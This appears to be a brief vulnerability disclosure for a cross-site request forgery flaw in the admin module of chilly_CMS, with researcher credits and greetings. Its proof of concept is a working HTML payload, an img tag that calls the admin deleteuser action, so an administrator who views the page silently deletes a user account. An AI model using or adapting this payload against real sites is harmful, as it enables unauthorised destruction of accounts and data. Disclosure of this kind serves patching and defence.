=======================================================================
chilly_CMS CSRF Vulnerability
=======================================================================# Vulnerability found in- Admin module# email Pratulag@yahoo.com# company aksitservices# Credit by Pratul Agrawal# Softwarechilly_CMS# Category CMS / Portals# Plateform php# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)#Proof of concept #
Script to Delete the Admin user through Cross Site request forgery
.................................................................................................................<html><body><img src=http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID]/></body></html>...................................................................................................................
After execution refresh the page and u can see that a added content is deleted automatically.#If you have any questions, comments, or concerns, feel free to contact me.
